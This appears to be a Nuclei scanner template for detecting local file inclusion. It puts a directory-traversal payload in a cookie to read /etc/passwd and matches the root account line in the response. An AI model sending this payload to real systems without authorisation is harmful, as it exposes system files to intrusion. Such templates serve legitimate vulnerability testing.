id: lfi-cookie

info:
  name: cookie-Local-File-Inclusion
  author: pelo
  severity: high
  description: |
     directory traversal via the GET /.. substring.

  tags: lfi,cookie-lfi

requests:
  - method: GET
    path:
      - "{{BaseURL}}"
    headers:
     User-Agent: "Mozila/5.0 (x11; Linux x86_x64) AppleWebkit/537.36 (KHTML, like gecko) chrome/87.0.4280.67 Safari"
     Host: "{{host}}"
     Accept: "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8"
     Accept-Language: "en-us,en;q=0.5"
     Accept-Encoding: "gzip, deflate"
     Connection: "close"
     Cookie: "usid=../../../../../../../../../../../../../etc/passwd; gid=095c1ab0-84e8-43e6-ab25-5af25643cf3e; hasclickedOnSignUpOr=true;"
    matchers:
      - type: regex
        part: body
        regex:
          - "root:[x*]:0:0"

